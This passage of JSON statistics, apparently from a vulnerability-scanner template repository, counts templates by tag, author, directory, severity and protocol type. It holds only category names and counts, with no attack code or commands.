tor","count":2},{"name":"wordfence","count":2},{"name":"smtp","count":2},{"name":"axis2","count":2},{"name":"frp","count":2},{"name":"mail","count":2},{"name":"splunk","count":2},{"name":"kentico","count":2},{"name":"emerge","count":2},{"name":"prestashop","count":2},{"name":"trixbox","count":2},{"name":"saltstack","count":2},{"name":"rockethchat","count":2},{"name":"ec2","count":2},{"name":"hjtcloud","count":2},{"name":"maian","count":2},{"name":"bigip","count":2},{"name":"cve2005","count":2},{"name":"chiyu","count":2},{"name":"odoo","count":2},{"name":"mida","count":2},{"name":"openfire","count":2},{"name":"service","count":2},{"name":"sharepoint","count":2},{"name":"yapi","count":2},{"name":"horde","count":2},{"name":"vrealize","count":2},{"name":"webcam","count":2},{"name":"akkadian","count":2},{"name":"flir","count":2},{"name":"avantfax","count":2},{"name":"xxljob","count":2},{"name":"hasura","count":2},{"name":"axis","count":2},{"name":"dolibarr","count":2},{"name":"nextjs","count":2},{"name":"ucmdb","count":2},{"name":"azure","count":2},{"name":"oauth","count":2},{"name":"hashicorp","count":2},{"name":"ecology","count":2},{"name":"huawei","count":2},{"name":"fortios","count":2},{"name":"jboss","count":2},{"name":"jsf","count":2},{"name":"nagios","count":2},{"name":"guacamole","count":2},{"name":"keycloak","count":2},{"name":"rstudio","count":2},{"name":"firebase","count":2},{"name":"kibana","count":2},{"name":"jeedom","count":2},{"name":"leak","count":2},{"name":"paloalto","count":2},{"name":"hpe","count":2},{"name":"couchdb","count":2},{"name":"middleware","count":2},{"name":"telerik","count":2},{"name":"shellshock","count":2},{"name":"phpcollab","count":2},{"name":"github","count":2},{"name":"mcafee","count":2},{"name":"prometheus","count":2},{"name":"natshell","count":2},{"name":"seeyon","count":2},{"name":"grav","count":2},{"name":"glassfish","count":2},{"name":"proxy","count":2},{"name":"hoteldruid","count":2},{"name":"geowebserver","count":2},{"name":"backdoor","count":2},{"name":"status","count":2},{"name":"sonarqube","count":2},{"name":"plesk","count":2},{"name":"sonicwall","count":2},{"name":"akamai","count":2},{"name":"linkerd","count":2},{"name":"injection","count":2},{"name":"globalprotect","count":2},{"name":"waf","count":2},{"name":"openam","count":2},{"name":"idrac","count":2},{"name":"spark","count":2},{"name":"smb","count":2},{"name":"icewarp","count":2},{"name":"cve2007","count":2},{"name":"rockmongo","count":2},{"name":"activemq","count":2},{"name":"pega","count":2},{"name":"cache","count":2},{"name":"netis","count":2},{"name":"dos","count":2},{"name":"bigbluebutton","count":1},{"name":"cacti","count":1},{"name":"b2evolution","count":1},{"name":"clave","count":1},{"name":"fastapi","count":1},{"name":"smartblog","count":1},{"name":"alibaba","count":1},{"name":"tongda","count":1},{"name":"zend","count":1},{"name":"api-manager","count":1},{"name":"zcms","count":1},{"name":"shopxo","count":1},{"name":"ns","count":1},{"name":"xdcms","count":1},{"name":"codemeter","count":1},{"name":"appweb","count":1},{"name":"rubedo","count":1},{"name":"vsftpd","count":1},{"name":"upload","count":1},{"name":"alertmanager","count":1},{"name":"argussurveillance","count":1},{"name":"sceditor","count":1},{"name":"chevereto","count":1},{"name":"expressjs","count":1},{"name":"empirecms","count":1},{"name":"goahead","count":1},{"name":"apiman","count":1},{"name":"nuuo","count":1},{"name":"dotnetnuke","count":1},{"name":"redcap","count":1},{"name":"panos","count":1},{"name":"ricoh","count":1},{"name":"javamelody","count":1},{"name":"xmlchart","count":1},{"name":"cgi","count":1},{"name":"smi","count":1},{"name":"trilithic","count":1},{"name":"lighttpd","count":1},{"name":"klog","count":1},{"name":"pulsesecure","count":1},{"name":"kafdrop","count":1},{"name":"selea","count":1},{"name":"sco","count":1},{"name":"zmanda","count":1},{"name":"getsimple","count":1},{"name":"openx","count":1},{"name":"adminer","count":1},{"name":"idemia","count":1},{"name":"timesheet","count":1},{"name":"sarg","count":1},{"name":"landray","count":1},{"name":"flink","count":1},{"name":"lanproxy","count":1},{"name":"circontrol","count":1},{"name":"ruby","count":1},{"name":"opensmtpd","count":1},{"name":"default","count":1},{"name":"ewebs","count":1},{"name":"rmc","count":1},{"name":"whm","count":1},{"name":"tracer","count":1},{"name":"camera","count":1},{"name":"lg-nas","count":1},{"name":"resourcespace","count":1},{"name":"comodo","count":1},{"name":"xiuno","count":1},{"name":"ambari","count":1},{"name":"zm","count":1},{"name":"froxlor","count":1},{"name":"clockwatch","count":1},{"name":"st","count":1},{"name":"mysql","count":1},{"name":"pippoint","count":1},{"name":"parentlink","count":1},{"name":"openerp","count":1},{"name":"linux","count":1},{"name":"ilo4","count":1},{"name":"camunda","count":1},{"name":"rujjie","count":1},{"name":"servicedesk","count":1},{"name":"jnoj","count":1},{"name":"acexy","count":1},{"name":"phpfusion","count":1},{"name":"redhat","count":1},{"name":"octobercms","count":1},{"name":"xvr","count":1},{"name":"phpinfo","count":1},{"name":"fortigates","count":1},{"name":"opm","count":1},{"name":"kong","count":1},{"name":"yii","count":1},{"name":"triconsole","count":1},{"name":"vnc","count":1},{"name":"clickhouse","count":1},{"name":"bash","count":1},{"name":"webui","count":1},{"name":"huijietong","count":1},{"name":"codeigniter","count":1},{"name":"cocoon","count":1},{"name":"memcached","count":1},{"name":"circontrorl","count":1},{"name":"visualtools","count":1},{"name":"domxss","count":1},{"name":"node-red-dashboard","count":1},{"name":"sourcebans","count":1},{"name":"clink-office","count":1},{"name":"scimono","count":1},{"name":"auth","count":1},{"name":"pyramid","count":1},{"name":"csrf","count":1},{"name":"dom","count":1},{"name":"vscode","count":1},{"name":"socomec","count":1},{"name":"eyelock","count":1},{"name":"74cms","count":1},{"name":"duomicms","count":1},{"name":"svnserve","count":1},{"name":"discord","count":1},{"name":"bolt","count":1},{"name":"acontent","count":1},{"name":"tika","count":1},{"name":"concrete","count":1},{"name":"zookeeper","count":1},{"name":"aruba","count":1},{"name":"enum","count":1},{"name":"flash","count":1},{"name":"zeroshell","count":1},{"name":"nedi","count":1},{"name":"adb","count":1},{"name":"commax","count":1},{"name":"ulterius","count":1},{"name":"opensns","count":1},{"name":"fuelcms","count":1},{"name":"apos","count":1},{"name":"nomad","count":1},{"name":"livezilla","count":1},{"name":"robomongo","count":1},{"name":"payara","count":1},{"name":"redis","count":1},{"name":"thinkadmin","count":1},{"name":"monitorix","count":1},{"name":"aura","count":1},{"name":"jsp","count":1},{"name":"javafaces","count":1},{"name":"myucms","count":1},{"name":"mautic","count":1},{"name":"mirai","count":1},{"name":"expose","count":1},{"name":"stem","count":1},{"name":"xunchi","count":1},{"name":"acme","count":1},{"name":"qcubed","count":1},{"name":"ioncube","count":1},{"name":"proftpd","count":1},{"name":"iptime","count":1},{"name":"phpfastcache","count":1},{"name":"fortiweb","count":1},{"name":"nsasg","count":1},{"name":"2014","count":1},{"name":"rdp","count":1},{"name":"manageengine","count":1},{"name":"centos","count":1},{"name":"announcekit","count":1},{"name":"dvwa","count":1},{"name":"monitorr","count":1},{"name":"cherokee","count":1},{"name":"phpunit","count":1},{"name":"servicenow","count":1},{"name":"glances","count":1},{"name":"fedora","count":1},{"name":"mdb","count":1},{"name":"exponentcms","count":1},{"name":"geutebruck","count":1},{"name":"dompdf","count":1},{"name":"trane","count":1},{"name":"lotuscms","count":1},{"name":"springframework","count":1},{"name":"crm","count":1},{"name":"extractor","count":1},{"name":"plastic","count":1},{"name":"nc2","count":1},{"name":"processmaker","count":1},{"name":"moin","count":1},{"name":"nps","count":1},{"name":"websvn","count":1},{"name":"sophos","count":1},{"name":"cobub","count":1},{"name":"weiphp","count":1},{"name":"solman","count":1},{"name":"ssl","count":1},{"name":"alerta","count":1},{"name":"jquery","count":1},{"name":"chinaunicom","count":1},{"name":"spectracom","count":1},{"name":"netrc","count":1},{"name":"tapestry","count":1},{"name":"blue-ocean","count":1},{"name":"ueditor","count":1},{"name":"accela","count":1},{"name":"nweb2fax","count":1},{"name":"faraday","count":1},{"name":"keenetic","count":1},{"name":"salesforce","count":1},{"name":"totaljs","count":1},{"name":"hortonworks","count":1},{"name":"ems","count":1},{"name":"upnp","count":1},{"name":"bitly","count":1},{"name":"uwsgi","count":1},{"name":"kubeflow","count":1},{"name":"tectuus","count":1},{"name":"enumeration","count":1},{"name":"rabbitmq","count":1},{"name":"ilo","count":1},{"name":"varnish","count":1},{"name":"plugin","count":1},{"name":"majordomo2","count":1},{"name":"anchorcms","count":1},{"name":"logontracer","count":1},{"name":"labtech","count":1},{"name":"mantis","count":1},{"name":"sureline","count":1},{"name":"traefik","count":1},{"name":"wuzhicms","count":1},{"name":"phalcon","count":1},{"name":"pacsone","count":1},{"name":"mongoshake","count":1},{"name":"spf","count":1},{"name":" default-login","count":1},{"name":"oneblog","count":1},{"name":"azkaban","count":1},{"name":"geddy","count":1},{"name":"zte","count":1},{"name":"sitecore","count":1},{"name":"k8","count":1},{"name":"oscommerce","count":1},{"name":"bruteforce","count":1},{"name":"owasp","count":1},{"name":"mariadb","count":1},{"name":"db","count":1},{"name":"gotmls","count":1},{"name":"portainer","count":1},{"name":"grails","count":1},{"name":"webmodule-ee","count":1},{"name":"office365","count":1},{"name":"pgadmin","count":1},{"name":"magicflow","count":1},{"name":"jitsi","count":1},{"name":"cyberoam","count":1},{"name":"couchbase","count":1},{"name":"visionhub","count":1},{"name":"postgres","count":1},{"name":"beanshell","count":1},{"name":"razor","count":1},{"name":"emby","count":1},{"name":"sqlite","count":1},{"name":"diris","count":1},{"name":"openstack","count":1},{"name":"yealink","count":1},{"name":"tjws","count":1},{"name":"metinfo","count":1},{"name":"exposures","count":1},{"name":"openrestry","count":1},{"name":"jeewms","count":1},{"name":"lansweeper","count":1},{"name":"calendarix","count":1},{"name":"nexusdb","count":1},{"name":"webmin","count":1},{"name":"mobileiron","count":1},{"name":"netsweeper","count":1},{"name":"ecom","count":1},{"name":"embedthis","count":1},{"name":"commscope","count":1},{"name":"opencast","count":1},{"name":"esmtp","count":1},{"name":"dbeaver","count":1},{"name":"plone","count":1},{"name":"wazuh","count":1},{"name":"hiboss","count":1},{"name":"biometrics","count":1},{"name":"kyan","count":1},{"name":"jfrog","count":1},{"name":"javascript","count":1},{"name":"wildfly","count":1},{"name":"cerebro","count":1},{"name":"checkpoint","count":1},{"name":"dvr","count":1},{"name":"eprints","count":1},{"name":"zenario","count":1},{"name":"wiki","count":1},{"name":"xml","count":1},{"name":"ruckus","count":1},{"name":"ntopng","count":1},{"name":"cloudflare","count":1},{"name":"interlib","count":1},{"name":"feifeicms","count":1},{"name":"rhymix","count":1},{"name":"zzzcms","count":1},{"name":"linkedin","count":1},{"name":"svn","count":1},{"name":"hadoop","count":1},{"name":"fastcgi","count":1},{"name":"maccmsv10","count":1},{"name":"cors","count":1},{"name":"fortigate","count":1},{"name":"redwood","count":1},{"name":"solarlog","count":1},{"name":"darkstat","count":1},{"name":"sprintful","count":1},{"name":"plc","count":1},{"name":"k8s","count":1},{"name":"sidekiq","count":1},{"name":"gateone","count":1},{"name":"emc","count":1},{"name":"qvisdvr","count":1},{"name":"timeclock","count":1},{"name":"zarafa","count":1},{"name":"gloo","count":1},{"name":"etouch","count":1},{"name":"fortinet","count":1},{"name":"skywalking","count":1},{"name":"linksys","count":1},{"name":"netgenie","count":1},{"name":"spring","count":1},{"name":"csod","count":1},{"name":"lutron","count":1},{"name":"node","count":1},{"name":"fiori","count":1},{"name":"wamp","count":1},{"name":"yachtcontrol","count":1},{"name":"landrayoa","count":1},{"name":"pcoip","count":1},{"name":"tensorboard","count":1},{"name":"floc","count":1},{"name":"rmi","count":1},{"name":"avtech","count":1},{"name":"netdata","count":1},{"name":"bullwark","count":1},{"name":"h3c-imc","count":1},{"name":"mpsec","count":1},{"name":"blackboard","count":1},{"name":"tieline","count":1},{"name":"nette","count":1},{"name":"sentry","count":1},{"name":"sangfor","count":1},{"name":"primetek","count":1},{"name":"seacms","count":1},{"name":"tenda","count":1},{"name":"szhe","count":1},{"name":"jenzabar","count":1},{"name":"avalanche","count":1},{"name":"blind","count":1},{"name":"rsyncd","count":1},{"name":"jmx","count":1},{"name":"opentsdb","count":1},{"name":"qdpm","count":1},{"name":"wavemaker","count":1},{"name":"smartsense","count":1},{"name":"email","count":1},{"name":"panabit","count":1},{"name":"mantisbt","count":1},{"name":"sgp","count":1},{"name":"scs","count":1},{"name":"postmessage","count":1},{"name":"vsphere","count":1},{"name":"heroku","count":1},{"name":"pagespeed","count":1},{"name":"ganglia","count":1},{"name":"sage","count":1},{"name":"xff","count":1},{"name":"wmt","count":1},{"name":"favicon","count":1},{"name":"viewlinc","count":1},{"name":"miscrsoft","count":1},{"name":"simplecrm","count":1},{"name":"subrion","count":1},{"name":"influxdb","count":1},{"name":"krweb","count":1},{"name":"zyxel","count":1},{"name":"turbocrm","count":1},{"name":"gogs","count":1},{"name":"rfi","count":1},{"name":"lancom","count":1},{"name":"druid","count":1},{"name":"discourse","count":1},{"name":"eyou","count":1},{"name":"owa","count":1},{"name":"drone","count":1},{"name":"iceflow","count":1},{"name":"arl","count":1},{"name":"octoprint","count":1},{"name":"twitter-server","count":1},{"name":"openemr","count":1},{"name":"synnefo","count":1},{"name":"spidercontrol","count":1},{"name":"qsan","count":1},{"name":"cve2006","count":1},{"name":"dotnet","count":1},{"name":"achecker","count":1},{"name":"cofax","count":1},{"name":"gitlist","count":1},{"name":"tamronos","count":1},{"name":"moinmoin","count":1},{"name":"powercreator","count":1},{"name":"wondercms","count":1},{"name":"wifisky","count":1},{"name":"saltapi","count":1},{"name":"realteo","count":1},{"name":"tensorflow","count":1},{"name":"mara","count":1},{"name":"tileserver","count":1},{"name":"addpac","count":1},{"name":"npm","count":1},{"name":"bookstack","count":1},{"name":"perl","count":1},{"name":"webftp","count":1},{"name":"kerbynet","count":1},{"name":"asus","count":1},{"name":"tpshop","count":1},{"name":"soar","count":1},{"name":"haproxy","count":1},{"name":"starttls","count":1},{"name":"gespage","count":1},{"name":"liferay","count":1},{"name":"optiLink","count":1},{"name":"swagger","count":1},{"name":"centreon","count":1},{"name":"webadmin","count":1},{"name":"jenkin","count":1},{"name":"wooyun","count":1},{"name":"setup","count":1},{"name":"ghost","count":1},{"name":"cloudinary","count":1},{"name":"nuxeo","count":1},{"name":"episerver","count":1},{"name":"mediumish","count":1},{"name":"bedita","count":1},{"name":"finereport","count":1},{"name":"erp-nc","count":1},{"name":"dotclear","count":1},{"name":"clusterengine","count":1},{"name":"htmli","count":1},{"name":"cse","count":1},{"name":"mailchimp","count":1},{"name":"doh","count":1},{"name":"exacqvision","count":1},{"name":"wing-ftp","count":1},{"name":"bazarr","count":1},{"name":"shopware","count":1},{"name":"sar2html","count":1},{"name":"mongo","count":1},{"name":"viewpoint","count":1},{"name":"aspnuke","count":1},{"name":"expn","count":1},{"name":"spip","count":1},{"name":"woocomernce","count":1},{"name":"wavlink","count":1},{"name":"ssltls","count":1},{"name":"harbor","count":1},{"name":"fortilogger","count":1},{"name":"dnssec","count":1},{"name":"nordex","count":1},{"name":"gridx","count":1}],"authors":[{"name":"dhiyaneshdk","count":245},{"name":"pikpikcu","count":244},{"name":"pdteam","count":198},{"name":"daffainfo","count":176},{"name":"geeknik","count":149},{"name":"dwisiswant0","count":132},{"name":"gy741","count":72},{"name":"madrobot","count":62},{"name":"princechaddha","count":54},{"name":"pussycat0x","count":48},{"name":"gaurang","count":42},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":24},{"name":"philippedelteil","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"righettod","count":10},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":9},{"name":"nadino","count":9},{"name":"hackergautam","count":9},{"name":"melbadry9","count":9},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"dogasantos","count":7},{"name":"emadshanab","count":7},{"name":"0x240x23elu","count":7},{"name":"techryptic (@tech)","count":7},{"name":"dr_set","count":7},{"name":"harshbothra_","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"oppsec","count":7},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"meme-lord","count":6},{"name":"caspergn","count":6},{"name":"rootxharsh","count":5},{"name":"joanbono","count":5},{"name":"pentest_swissky","count":5},{"name":"iamnoooob","count":5},{"name":"ganofins","count":5},{"name":"logicalhunter","count":5},{"name":"elsfa7110","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"xelkomy","count":4},{"name":"e_schultze_","count":4},{"name":"nodauf","count":4},{"name":"github.com/its0x08","count":4},{"name":"jarijaas","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"incogbyte","count":3},{"name":"lu4nx","count":3},{"name":"fyoorer","count":3},{"name":"z3bd","count":3},{"name":"dudez","count":3},{"name":"tess","count":3},{"name":"binaryfigments","count":3},{"name":"vsh00t","count":3},{"name":"0w4ys","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"_generic_human_","count":3},{"name":"shine","count":3},{"name":"emenalf","count":3},{"name":"f1tz","count":3},{"name":"impramodsargar","count":3},{"name":"thomas_from_offensity","count":3},{"name":"alifathi-h1","count":2},{"name":"random-robbie","count":2},{"name":"kiblyn11","count":2},{"name":"udit_thakkur","count":2},{"name":"afaq","count":2},{"name":"nkxxkn","count":2},{"name":"x1m_martijn","count":2},{"name":"pxmme1337","count":2},{"name":"unstabl3","count":2},{"name":"cocxanh","count":2},{"name":"hahwul","count":2},{"name":"amsda","count":2},{"name":"dheerajmadhukar","count":2},{"name":"swissky","count":2},{"name":"0xprial","count":2},{"name":"bing0o","count":2},{"name":"joeldeleep","count":2},{"name":"bp0lr","count":2},{"name":"gal nagli","count":2},{"name":"whoever","count":2},{"name":"w4cky_","count":2},{"name":"gevakun","count":2},{"name":"foulenzer","count":2},{"name":"davidmckennirey","count":2},{"name":"moritz nentwig","count":2},{"name":"vavkamil","count":2},{"name":"manas_harsh","count":2},{"name":"parth","count":2},{"name":"0xelkomy","count":2},{"name":"zomsop82","count":2},{"name":"ehsahil","count":2},{"name":"0xcrypto","count":2},{"name":"sushantkamble","count":2},{"name":"randomrobbie","count":2},{"name":"fabaff","count":2},{"name":"hetroublemakr","count":2},{"name":"0xsapra","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"bsysop","count":2},{"name":"koti2","count":2},{"name":"lotusdll","count":2},{"name":"ree4pwn","count":2},{"name":"0xrudra","count":2},{"name":"arcc","count":2},{"name":"mohammedsaneem","count":2},{"name":"berkdusunur","count":1},{"name":"borna nematzadeh","count":1},{"name":"intx0x80","count":1},{"name":"fopina","count":1},{"name":"micha3lb3n","count":1},{"name":"rodnt","count":1},{"name":"kareemse1im","count":1},{"name":"alph4byt3","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"geraldino2","count":1},{"name":"me9187","count":1},{"name":"makyotox","count":1},{"name":"cookiehanhoan","count":1},{"name":"pratik khalane","count":1},{"name":"manuelbua","count":1},{"name":"_darrenmartyn","count":1},{"name":"revblock","count":1},{"name":"schniggie","count":1},{"name":"tirtha_mandal","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"petruknisme","count":1},{"name":"mubassirpatel","count":1},{"name":"ooooooo_q","count":1},{"name":"d0rkerdevil","count":1},{"name":"huowuzhao","count":1},{"name":"furkansenan","count":1},{"name":"thevillagehacker","count":1},{"name":"sy3omda","count":1},{"name":"0h1in9e","count":1},{"name":"kabirsuda","count":1},{"name":"bernardofsr","count":1},{"name":"flag007","count":1},{"name":"soyelmago","count":1},{"name":"exploitation","count":1},{"name":"toufik airane","count":1},{"name":"luci","count":1},{"name":"hanlaomo","count":1},{"name":"udyz","count":1},{"name":"thezakman","count":1},{"name":"b4uh0lz","count":1},{"name":"ahmed sherif","count":1},{"name":"chron0x","count":1},{"name":"ilovebinbash","count":1},{"name":"johnk3r","count":1},{"name":"_c0wb0y_","count":1},{"name":"alperenkesk","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"whynotke","count":1},{"name":"becivells","count":1},{"name":"jteles","count":1},{"name":"retr0","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"s1r1u5_","count":1},{"name":"affix","count":1},{"name":"0xteles","count":1},{"name":"co0nan","count":1},{"name":"juicypotato1","count":1},{"name":"streetofhackerr007","count":1},{"name":"yashanand155","count":1},{"name":"adrianmf","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"52971","count":1},{"name":"akshansh","count":1},{"name":"r3naissance","count":1},{"name":"deena","count":1},{"name":"ohlinge","count":1},{"name":"0xrod","count":1},{"name":"idealphase","count":1},{"name":"convisoappsec","count":1},{"name":"zandros0","count":1},{"name":"luskabol","count":1},{"name":"naglinagli","count":1},{"name":"0xtavian","count":1},{"name":"regala_","count":1},{"name":"absshax","count":1},{"name":"aresx","count":1},{"name":"zhenwarx","count":1},{"name":"sickwell","count":1},{"name":"andirrahmani1","count":1},{"name":"taielab","count":1},{"name":"ldionmarcil","count":1},{"name":"th3.d1p4k","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"daviey","count":1},{"name":"philippdelteil","count":1},{"name":"dawid czarnecki","count":1},{"name":"hakluke","count":1},{"name":"divya_mudgal","count":1},{"name":"shelld3v","count":1},{"name":"b0yd","count":1},{"name":"johnjhacking","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"ringo","count":1},{"name":"shifacyclewla","count":1},{"name":"mah3sec_","count":1},{"name":"pdp","count":1},{"name":"mesaglio","count":1},{"name":"g4l1t0","count":1},{"name":"un-fmunozs","count":1},{"name":"yavolo","count":1},{"name":"omarkurt","count":1},{"name":"willd96","count":1},{"name":"elmahdi","count":1},{"name":"ipanda","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"noamrathaus","count":1},{"name":"rtcms","count":1},{"name":"alex","count":1},{"name":"defr0ggy","count":1},{"name":"infosecsanyam","count":1},{"name":"notsoevilweasel","count":1},{"name":"fmunozs","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"qlkwej","count":1},{"name":"yashgoti","count":1},{"name":"nytr0gen","count":1},{"name":"mhdsamx","count":1},{"name":"tim_koopmans","count":1},{"name":"rojanrijal","count":1},{"name":"iampritam","count":1},{"name":"its0x08","count":1},{"name":"sullo","count":1},{"name":"g4l1t0 and @convisoappsec","count":1},{"name":"abison_binoy","count":1},{"name":"pudsec","count":1},{"name":"remonsec","count":1},{"name":"_harleo","count":1},{"name":"sicksec","count":1},{"name":"bolli95","count":1},{"name":"knassar702","count":1},{"name":"ajaysenr","count":1},{"name":"0ut0fb4nd","count":1},{"name":"bad5ect0r","count":1},{"name":"kre80r","count":1},{"name":"bjhulst","count":1},{"name":"raesene","count":1},{"name":"sshell","count":1},{"name":"kurohost","count":1},{"name":"patralos","count":1},{"name":"elder tao","count":1},{"name":"c3l3si4n","count":1},{"name":"j33n1k4","count":1},{"name":"@dwisiswant0","count":1},{"name":"mass0ma","count":1},{"name":"smaranchand","count":1},{"name":"evolutionsec","count":1},{"name":"jeya seelan","count":1},{"name":"apt-mirror","count":1},{"name":"wabafet","count":1},{"name":"vzamanillo","count":1},{"name":"akash.c","count":1},{"name":"b0rn2r00t","count":1},{"name":"sec_hawk","count":1},{"name":"undefl0w","count":1},{"name":"andysvints","count":1},{"name":"blckraven","count":1},{"name":"gboddin","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"shreyapohekar","count":1}],"directory":[{"name":"cves","count":657},{"name":"vulnerabilities","count":284},{"name":"exposed-panels","count":235},{"name":"exposures","count":185},{"name":"technologies","count":164},{"name":"misconfiguration","count":125},{"name":"takeovers","count":71},{"name":"default-logins","count":52},{"name":"file","count":46},{"name":"workflows","count":35},{"name":"network","count":30},{"name":"miscellaneous","count":28},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"cnvd","count":9},{"name":"fuzzing","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":610},{"name":"high","count":526},{"name":"medium","count":406},{"name":"critical","count":232},{"name":"low","count":160}],"types":[{"name":"http","count":1833},{"name":"file","count":46},{"name":"network","count":39},{"name":"dns","count":11}]} +{"tags":[{"name":"cve","count":666},{"name":"panel","count":236},{"name":"lfi","count":228},{"name":"xss","count":225},{"name":"exposure","count":221},{"name":"wordpress","count":206},{"name":"rce","count":193},{"name":"cve2020","count":159},{"name":"wp-plugin","count":139},{"name":"cve2021","count":112},{"name":"tech","count":111},{"name":"config","count":93},{"name":"cve2019","count":90},{"name":"cve2018","count":80},{"name":"takeover","count":74},{"name":"apache","count":66},{"name":"","count":66},{"name":"token","count":64},{"name":"default-login","count":60},{"name":"joomla","count":59},{"name":"iot","count":58},{"name":"cve2010","count":51},{"name":"cve2017","count":49},{"name":"oob","count":48},{"name":"file","count":46},{"name":"unauth","count":45},{"name":"network","count":39},{"name":"sqli","count":38},{"name":"ssrf","count":35},{"name":"cve2016","count":32},{"name":"oracle","count":31},{"name":"logs","count":30},{"name":"workflow","count":30},{"name":"jira","count":28},{"name":"redirect","count":28},{"name":"atlassian","count":27},{"name":"listing","count":25},{"name":"misc","count":23},{"name":"cve2015","count":20},{"name":"disclosure","count":20},{"name":"router","count":19},{"name":"aem","count":19},{"name":"generic","count":19},{"name":"cisco","count":19},{"name":"sap","count":18},{"name":"auth-bypass","count":17},{"name":"springboot","count":16},{"name":"cve2014","count":15},{"name":"debug","count":15},{"name":"cve2012","count":14},{"name":"misconfig","count":14},{"name":"struts","count":13},{"name":"android","count":13},{"name":"cve2011","count":13},{"name":"adobe","count":13},{"name":"fuzz","count":13},{"name":"php","count":13},{"name":"devops","count":12},{"name":"weblogic","count":12},{"name":"jenkins","count":12},{"name":"dns","count":12},{"name":"dlink","count":12},{"name":"zoho","count":11},{"name":"cve2013","count":11},{"name":"ftp","count":9},{"name":"aws","count":9},{"name":"xxe","count":9},{"name":"magento","count":9},{"name":"cnvd","count":8},{"name":"login","count":8},{"name":"scada","count":8},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"cms","count":7},{"name":"coldfusion","count":7},{"name":"backup","count":7},{"name":"cve2009","count":7},{"name":"kubernetes","count":7},{"name":"nginx","count":7},{"name":"netgear","count":7},{"name":"files","count":7},{"name":"vmware","count":7},{"name":"google","count":6},{"name":"cve2008","count":6},{"name":"jetty","count":6},{"name":"citrix","count":6},{"name":"dell","count":6},{"name":"confluence","count":6},{"name":"laravel","count":6},{"name":"solr","count":6},{"name":"docker","count":6},{"name":"rconfig","count":6},{"name":"django","count":6},{"name":"api","count":6},{"name":"java","count":5},{"name":"ibm","count":5},{"name":"drupal","count":5},{"name":"lucee","count":5},{"name":"windows","count":5},{"name":"ssti","count":5},{"name":"headless","count":5},{"name":"dedecms","count":5},{"name":"fileupload","count":5},{"name":"wp-theme","count":5},{"name":"nodejs","count":5},{"name":"microsoft","count":5},{"name":"phpmyadmin","count":5},{"name":"printer","count":5},{"name":"circarlife","count":5},{"name":"iis","count":5},{"name":"tomcat","count":4},{"name":"thinkphp","count":4},{"name":"exchange","count":4},{"name":"asp","count":4},{"name":"hp","count":4},{"name":"glpi","count":4},{"name":"thinkcmf","count":4},{"name":"magmi","count":4},{"name":"jolokia","count":4},{"name":"firmware","count":4},{"name":"elastic","count":4},{"name":"webserver","count":4},{"name":"vpn","count":4},{"name":"zimbra","count":4},{"name":"solarwinds","count":4},{"name":"artifactory","count":4},{"name":"symfony","count":4},{"name":"wso2","count":4},{"name":"buffalo","count":4},{"name":"moodle","count":4},{"name":"grafana","count":4},{"name":"samsung","count":4},{"name":"traversal","count":4},{"name":"deserialization","count":4},{"name":"crlf","count":4},{"name":"hongdian","count":4},{"name":"targa","count":3},{"name":"bitrix","count":3},{"name":"oa","count":3},{"name":"fpd","count":3},{"name":"terramaster","count":3},{"name":"slack","count":3},{"name":"amazon","count":3},{"name":"tikiwiki","count":3},{"name":"backups","count":3},{"name":"openssh","count":3},{"name":"nacos","count":3},{"name":"zabbix","count":3},{"name":"springcloud","count":3},{"name":"httpd","count":3},{"name":"kevinlab","count":3},{"name":"vbulletin","count":3},{"name":"ssh","count":3},{"name":"caucho","count":3},{"name":"nexus","count":3},{"name":"zhiyuan","count":3},{"name":"r-seenet","count":3},{"name":"mongodb","count":3},{"name":"git","count":3},{"name":"itop","count":3},{"name":"intrusive","count":3},{"name":"opensis","count":3},{"name":"resin","count":3},{"name":"kafka","count":3},{"name":"nosqli","count":3},{"name":"lfr","count":3},{"name":"ebs","count":3},{"name":"fanruan","count":3},{"name":"microstrategy","count":3},{"name":"log","count":3},{"name":"ofbiz","count":3},{"name":"bypass","count":3},{"name":"cve2007","count":2},{"name":"sharepoint","count":2},{"name":"showdoc","count":2},{"name":"hjtcloud","count":2},{"name":"horde","count":2},{"name":"yapi","count":2},{"name":"prestashop","count":2},{"name":"github","count":2},{"name":"natshell","count":2},{"name":"linkerd","count":2},{"name":"chamilo","count":2},{"name":"dos","count":2},{"name":"npm","count":2},{"name":"emerge","count":2},{"name":"rstudio","count":2},{"name":"phpcollab","count":2},{"name":"strapi","count":2},{"name":"akamai","count":2},{"name":"spark","count":2},{"name":"shellshock","count":2},{"name":"smtp","count":2},{"name":"ucmdb","count":2},{"name":"splunk","count":2},{"name":"grav","count":2},{"name":"oauth","count":2},{"name":"rockethchat","count":2},{"name":"injection","count":2},{"name":"leak","count":2},{"name":"jellyfin","count":2},{"name":"saltstack","count":2},{"name":"sonicwall","count":2},{"name":"fortio